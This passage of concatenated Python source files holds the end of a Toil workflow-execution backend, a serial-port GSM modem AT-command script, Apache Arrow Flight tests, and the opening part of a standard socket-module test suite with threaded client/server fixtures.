'supported_wes_versions': '0.3.0',
'supported_filesystem_protocols': ['file', 'http', 'https'],
'engine_versions': ['3.16.0'],
'system_state_counts': {},
'key_values': {}
}
@catch_toil_exceptions
def ListWorkflows(self):
# FIXME #15 results don't page
workflows = []
for l in os.listdir(os.path.join(os.getcwd(), 'workflows')):
if os.path.isdir(os.path.join(os.getcwd(), 'workflows', l)):
w = ToilWorkflow(l)
workflows.append({'workflow_id': w.workflow_id, 'state': w.getstate()[0]})
return {
'workflows': workflows,
'next_page_token': ''
}
# @catch_toil_exceptions
# def RunWorkflow(self, body):
# # FIXME Add error responses #16
# workflow_id = uuid.uuid4().hex
# job = ToilWorkflow(workflow_id)
# job.run(body, self)
# return {"workflow_id": workflow_id}
@catch_toil_exceptions
def RunWorkflow(self, body):
workflow_id = uuid.uuid4().hex
job = ToilWorkflow(workflow_id)
p = Process(target=job.run, args=(body, self))
p.start()
self.processes[workflow_id] = p
return {'workflow_id': workflow_id}
@catch_toil_exceptions
def GetWorkflowLog(self, workflow_id):
job = ToilWorkflow(workflow_id)
return job.getlog()
@catch_toil_exceptions
def CancelJob(self, workflow_id):
# should this block with `p.is_alive()`?
if workflow_id in self.processes:
self.processes[workflow_id].terminate()
return {'workflow_id': workflow_id}
@catch_toil_exceptions
def GetWorkflowStatus(self, workflow_id):
job = ToilWorkflow(workflow_id)
return job.getstatus()
def create_backend(app, opts):
return ToilBackend(opts)
|
gsm.py
|
import serial
import time
from threading import Thread, Lock
from curses import ascii
# Enable Serial Communication
ser = serial.Serial()
ser.port = "/dev/ttyAMA0"
ser.baudrate = 115200
ser.timeout = 1
def doRead(ser, lock):
while True:
lock.acquire()
try:
rcv = ser.readline().decode().strip('\n')
except:
pass
else:
while rcv != '':
print(rcv)
rcv = ser.readline().decode().strip('\n').strip('\r')
lock.release()
time.sleep(.15)
ser.open()
ser_lock = Lock()
th = Thread(target=doRead, args=(ser, ser_lock))
th.daemon = True
th.start()
gotlock = ser_lock.acquire()
ser.write(b'AT+CMGF=1\r')
ser.write(b'AT+CPMS="ME","SM","ME"\r')
ser_lock.release()
time.sleep(.15)
try:
ser_lock.acquire()
except:
time.sleep(.1)
else:
ser.write(b'AT+CPIN?\r')
ser_lock.release()
time.sleep(.15)
while True:
try:
cmd = input()
except:
pass
else:
ser_lock.acquire()
if '^z' in cmd:
ser.write(bytes('{}\r'.format(ascii.ctrl('z')), 'utf-8'))
else:
ser.write(bytes('{}\r'.format(cmd), 'utf-8'))
ser_lock.release()
time.sleep(.15)
|
test_flight.py
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import contextlib
import socket
import threading
import pytest
import pyarrow as pa
flight = pytest.importorskip("pyarrow.flight")
class ConstantFlightServer(flight.FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
def do_get(self, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.RecordBatchStream(table)
class EchoFlightServer(flight.FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self):
super(EchoFlightServer, self).__init__()
self.last_message = None
def do_get(self, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, descriptor, reader):
self.last_message = reader.read_all()
@contextlib.contextmanager
def flight_server(server_base, *args, **kwargs):
"""Spawn a Flight server on a free port, shutting it down when done."""
# Find a free port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with contextlib.closing(sock) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = sock.getsockname()[1]
server_instance = server_base(*args, **kwargs)
def _server_thread():
server_instance.run(port)
thread = threading.Thread(target=_server_thread, daemon=True)
thread.start()
yield port
server_instance.shutdown()
thread.join()
def test_flight_do_get():
"""Try a simple do_get call."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
data = client.do_get(flight.Ticket(b''), table.schema).read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with flight_server(EchoFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
writer = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b''), data.schema).read_all()
assert result.equals(data)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
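# Illustrative, hypothetical usage of the client_skip mechanism inside a
# ThreadableTest-style class (testSpam/_testSpam are made-up names; the
# requireAttrs()/requireSocket() helpers below set client_skip the same way):
#
#     @skipWithClientIf(not hasattr(socket.socket, "sendmsg"),
#                       "don't have sendmsg")
#     def testSpam(self):          # server half; skipped when the condition holds
#         ...
#     @testSpam.client_skip
#     def _testSpam(self):         # client half; reduced to a no-op when skipped
#         ...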
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
# TODO: RUSTPYTHON
@unittest.expectedFailure
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
        self.assertIn('not NoneType', str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
        if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
